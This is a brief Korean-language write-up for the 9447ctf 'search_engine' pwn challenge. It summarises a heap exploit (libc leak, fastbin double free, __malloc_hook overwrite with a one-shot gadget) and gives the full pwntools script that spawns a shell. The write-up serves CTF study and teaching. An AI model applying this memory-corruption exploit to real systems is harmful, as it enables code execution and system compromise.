9447ctf - search_engine
먼저 smallbin을 만들고 search를 이용하여 libc leak
fastbin 3개를 만들고 double free
fd를 __malloc_hook-35로 설정
__malloc_hook -> oneshot
get shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 | from pwn import * def search(size,word): sla('3: Quit\n','1') sla('size:',str(size)) sa('word:',word) def index(size,sentence): sla('3: Quit\n','2') sla('size:',str(size)) sa('sentence:',sentence) r=process('./search') e=ELF('./search') libc=e.libc oneshot=0x4526a sla=r.sendlineafter sa=r.sendafter ru=r.recvuntil pay='s'*0x85+' m' index(len(pay),pay) search(1,'m') sla('?','y') search('1','\x00') ru('Found 135: ') leak=u64(r.recv(6).ljust(8,'\x00'))-0x3c4b78 log.info(hex(leak)) sla('?','n') pay='A'*0x5d+' a ' index(len(pay),pay) index(len(pay),pay) index(len(pay),pay) search(1,'a') sla('?','y') sla('?','y') sla('?','y') search(1,'\x00') sla('?','y') sla('?','y') sla('?','n') pay=p64(leak+libc.symbols['__malloc_hook']-35)*2 pay=pay.ljust(0x5e,'A') payload='A'*19+p64(leak+0xf02a4) payload=payload.ljust(0x5d,'A') index(len(pay),pay) index(len(pay),pay) index(len(pay),pay) index(len(payload),payload) r.interactive() | cs |